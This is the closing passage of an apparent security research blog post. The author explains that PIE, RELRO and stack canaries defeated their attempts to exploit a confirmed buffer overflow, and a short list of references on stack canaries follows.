So, yeah — (smarter) bruteforcing was out of the question. Since along the way I’d also learned PIE and RELRO was enabled on the binary, I called it quits at this point and feel pretty confident in saying this isn’t an exploitable issue.
conclusion
This turned out to be a long journey that gave me a chance to become more familiar with some of the internals of this system. It also forced me to get creative in finding ways to debug and test things out, which taught me some new tricks. In the end, I was able to definitively confirm the buffer overflow could be reached, but the mitigations in place combined with the nuances of the environment proved to be enough to thwart my exploitation attempts.
Alas, this is the life of security research — sometimes, even when you’ve found the bug, there’s still no guarantee you’ll be able to exploit it.
references
- Stack Canaries – Gingerly Sidestepping the Cage [2021]
- LiveOverflow video
- CTF guide on stack canaries
- Bruteforcing x86 Stack Canaries